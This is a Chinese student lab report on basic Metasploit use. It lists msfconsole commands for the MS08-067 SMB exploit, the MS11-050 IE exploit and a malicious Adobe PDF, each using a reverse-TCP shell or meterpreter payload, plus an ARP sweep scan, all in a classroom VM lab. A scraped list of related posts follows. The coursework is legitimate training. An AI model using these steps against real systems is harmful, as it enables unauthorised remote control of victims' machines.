20145202马超《网络对抗》Exp5MSF基础应用

本实践目标,掌握metasploit的基本应用方式,掌握常用的三种攻击方式的思路。具体需要完成(1)一个主动攻击,如ms08_067;(2)一个针对浏览器的攻击,如ms11_050;(3)一个针对客户端的攻击,如Adobe(4)成功应用任何一个辅助模块。
以上四个小实践可不限于以上示例,并要求至少有一个是和其他所有同学不一样的,否则扣除0.5分。

实验指导(http://www.cnblogs.com/yayaer/p/6690577.html)

报告内容

MS08_067漏洞渗透攻击实践

1、两台虚拟机,其中一台为kali,一台为windows xp sp3(英文版)。
2、在VMware中设置两台虚拟机网络为NAT模式,自动分配IP地址,之后两台虚拟机就可以直接ping通。
这之间遇到了一个问题,电脑卡死了导致再打开kali的时候发现ip不对,不会调,结果偶然间发现n年前快照过一次,恢复快照后又能用了

如果ping不通,一般是ip地址不在同一个网段上,需要重新设置xp的ip地址,打开:控制面板->网络连接->右击本地连接选择属性->选择internet协议(TCP/IP)->属性,就可以编辑ip地址了。例如:kali ip是192.168.23.129,xp ip设置为:192.168.23.128。前三位一样,最后一位随便设置。

3.在kali终端中开启msfconsole。
4.输入命令search ms08_067,会显示出找到的渗透模块,如下图所示

5.输入命令use exploit/windows/smb/ms08_067_netapi,进入该漏洞模块的使用。

6、输入命令show payload会显示出有效的攻击载荷,如下图所示,我们找到一个shell_reverse_tcp。

7.命令show targets会显示出可以被攻击的靶机的操作系统型号。
8.使用命令set payload generic/shell_reverse_tcp设置攻击有效载荷。

9、输入命令show options显示我们需要在攻击前需要设置的数据。

10、输入命令

set LHOST "kali Ip"

set RHOST "Win xp Ip
11、输入命令exploit开始攻击,如下图所示是正常攻击成功结果

IE浏览器渗透攻击——MS11050安全漏洞

1.在kali终端中开启msfconsole。

2、输入命令use windows/browser/ms11_050_mshtml_cobjectelement,进入该漏洞模块。

3、输入info查看信息:

4.设置对应的载荷set payload windows/meterpreter/reverse_tcp
5、show options查看需要设置的相关信息
6、设置相关信息

set LHOST ‘kali Ip’

set LPORT XXXX

set URIPATH XX

7、exploit,如下图所示,有靶机需要访问的ip地址:

8、在靶机IE上输入网址,并在靶机上查看信息。
到了这里我遇到了一个问题,就是sp3里面的浏览器不是ie7,所以上图会显示成那样,没有session 1,后来我又尝试下了很多ie7的安装包但是实在是太卡了而且无数盗版,所以就没有再做下去,如果换了浏览器理论上是可以做出结果的我距离结果也就差一步,但是这个实验要求上说的很清楚,“掌握metasploit的基本应用方式,掌握常用的三种攻击方式的思路”,重点在掌握思路,所以我就没有在做下去,如果扣分的话请老师在评论区里说一下要扣分我就把这个补上。

Adobe阅读器渗透攻击

1、两台虚拟机,其中一台为kali,一台为windows xp sp3。

2、设置虚拟机网络为NAT模式,保证两台虚拟机可以ping通。

3、kali下打开显示隐藏文件,如下图,先打开主文件夹,在右上角打开如下图所示位置:

4.在kali终端中开启msfconsole。

5、输入命令use exploit/windows/fileformat/adobe_cooltype_sing,进入该漏洞模块的使用。

6、使用命令set payload windows/meterpreter/reverse_tcp设置攻击有效载荷。

7、输入命令show options显示我们需要在攻击前需要设置的数据.
8.输入命令

set FILENAME xxx.pdf

set LHOST "KALI Ip"

set LPORT xxxx
9.输入exploit,生成pdf文件,并可以看到pdf所在文件夹,将pdf复制到靶机里。

10.使用命令back退出当前模块,并使用use exploit/multi/handler新建一个监听模块。

11、使用set payload windows/meterpreter/reverse_tcp建立一个反向连接。如下图所示,我需要输入命令set LPORT 5555和攻击模块里的数据设置为一样的。
12、使用命令exploit开始攻击,在xp中打开pdf。如下图:
这很明显,攻击成功了

自己做的辅助模块

1.将kali机的模式改为桥接模式,使他和主机ping通,主机连接的是无线网。
2.先手动创建一个msf所需的数据库

service postgresql start

msfdb start
3、开启msf
4.输入命令 use auxiliary/scanner/discovery/arp_sweep进入模块
5.show options查看需要设置的消息,其中rhost填写自己电脑所在网段

6.使用命令,设置

set interface eth0

set RHOSTS 172.30.1.0/21

set threads 2

7.run

应该是网络的问题,它提示没有ipv4的地址,而且我的虚拟机提示网桥没有正确打开,网桥崩了,求解决方案。
解决了之后有了ip
run之后结果:

当时宿舍没人用电脑,嗯,的确是这样。而且貌似打开防火墙的话扫描不到。

实验指导(http://www.cnblogs.com/yayaer/p/6685527.html)
1.实验后回答问题

(1)用自己的话解释什么是exploit,payload,encode.
exploit:在kali里面进行攻击的时候要使用的代码是exploit
payload:目测来看是一种攻击载体,然而我并不知道什么事攻击载体,感觉类似于声音借助于空气转播,声音是恶意代码,人类是靶机,空气就是payload
encode:直译为编码,顾名思义就是把恶意代码进行编码然后免杀
2.实验总结与体会

  • 感觉i3实在是不行了,太慢了。
  • 对于这次实验的话,感觉攻击手段还是很多样的,在于如何去发现咯偶懂以及利用漏洞,而我们做的只是利用漏洞,说白了只是完成了最后一击,玩别人剩下的,想必那些黑客门天天研究有哪些漏洞有哪些后门真心挺累的。
  • 漏洞这种东西很强大,点开一个pdf就能被控制,而且作为一个平民百姓也不可能用多么高深的手段去防守,与其每天吓唬自己还不如该干啥干啥。

3.实践过程记录,体现学号,可记录自己认为重要的或思考过的点,不需要每步都记录

转载于:https://www.cnblogs.com/tuolemi/p/6704158.html

20145202马超《网络对抗》Exp5MSF基础应用相关推荐

  1. 20145227鄢曼君《网络对抗》逆向及Bof基础

    20145227鄢曼君<网络对抗>逆向及Bof基础 实践目标 本次实践的对象是一个名为pwn1的linux可执行文件. 该程序正常执行流程是:main调用foo函数,foo函数会简单回显任 ...

  2. 2018-2019 20165237网络对抗 Exp5 MSF基础应用

    2018-2019 20165237网络对抗 Exp5 MSF基础应用 实验目标 本实践目标是掌握metasploit的基本应用方式,重点常用的三种攻击方式的思路.具体需要完成: 一个主动攻击实践,如 ...

  3. 20155227《网络对抗》Exp5 MSF基础应用

    20155227<网络对抗>Exp5 MSF基础应用 基础问题回答 用自己的话解释什么是exploit,payload,encode exploit:把实现设置好的东西送到要攻击的主机里. ...

  4. 2018-2019 20165208 网络对抗 Exp9 Web安全基础

    目录 2018-2019 20165208 网络对抗 Exp9 Web安全基础 实验内容 基础问题回答 实践过程记录 1. WebGoat准备 2. SQL注入攻击 2.1 Command Injec ...

  5. [Python图像识别] 四十九.图像生成之什么是生成对抗网络GAN?基础原理和代码普及

    该系列文章是讲解Python OpenCV图像处理知识,前期主要讲解图像入门.OpenCV基础用法,中期讲解图像处理的各种算法,包括图像锐化算子.图像增强技术.图像分割等,后期结合深度学习研究图像识别 ...

  6. [Python人工智能] 二十九.什么是生成对抗网络GAN?基础原理和代码普及(1)

    从本专栏开始,作者正式研究Python深度学习.神经网络及人工智能相关知识.前一篇文章分享了Keras实现经典的深度学习文本分类算法,包括LSTM.BiLSTM.BiLSTM+Attention和CN ...

  7. 20145233《网络对抗》Exp8 Web基础

    20145233<网络对抗>Exp8 Web基础 实验问题思考 什么是表单? 表单在网页中主要负责数据采集功能 一个表单有三个基本组成部分: 表单标签 表单域:包含了文本框.密码框.隐藏域 ...

  8. 20145227鄢曼君《网络对抗》Web安全基础实践

    20145227鄢曼君<网络对抗>Web安全基础实践 实验后回答问题 1.SQL注入攻击原理,如何防御? SQL注入攻击指的是通过构建特殊的输入作为参数传入Web应用程序,而这些输入大都是 ...

  9. 20155202《网络对抗》Exp9 web安全基础实践

    20155202<网络对抗>Exp9 web安全基础实践 实验前回答问题 (1)SQL注入攻击原理,如何防御 SQL注入产生的原因,和栈溢出.XSS等很多其他的攻击方法类似,就是未经检查或 ...

最新文章

  1. IC/FPGA笔试/面试题分析(九)关于FIFO最小深度计算的问题
  2. 京东css3动画全屏海报_京东超市的文案,写到吃货心坎里了
  3. 装完nvme固态经常蓝屏_微软确认Win10 20H2使用雷电连接固态盘会直接蓝屏死机
  4. 同一批电脑cpu序列号_新电脑到手后,你会验货吗?怎么检查新电脑?
  5. python中的捕获异常、异常跟踪
  6. Git复习(十一)之常见命令用法
  7. 把虚拟机装到内存里(打开PScs3只需要2秒)
  8. 求出100~200之间的素数
  9. 62、滑动窗口的最大值
  10. sysctl.conf文件详解
  11. JavaScript设计模式返璞归真
  12. 【历史上的今天】8 月 13 日:Oracle 起诉 Google,Java 版权案正式开启!
  13. js 实现php md5加密,js实现md5加密插件代码分享
  14. SQL Server 2005系列教学(12) 导入导出服务
  15. java类 uuid_Java常用类——UUID类
  16. linux开启关闭网络指令
  17. 玩出新花样—文言文编程
  18. tun驱动之read
  19. Scrapy爬虫项目的管理部署
  20. android pay 机型,苹果有ApplePay,那你知道这些安卓机Pay吗

热门文章

  1. MOOC《Python语言程序设计》(第15次)基本图形绘制(第二周)
  2. moment 时间国际化问题
  3. 制作滚动表格,循环列表表格内容
  4. Git新建分支出现fatal: Not a valid object name: ‘master‘错误的解决办法
  5. 3500x架构_为什么锐龙5 3500X被称为神U,3大优势当之无愧
  6. Linux CentOS 7 安装字体库 中文字体
  7. 魅族16支持html吗,魅族 16支持快充么?
  8. 第五代人工智能计算机正在被研发英语,所谓的“第五代计算机”被称为什么计算机?...
  9. hdu - 6406 Taotao Picks Apples(离线+离散+技巧)
  10. 大天使黎明服务器维护,37暗黑大天使7月30日部分区服维护公告-暗黑大天使手机版官网...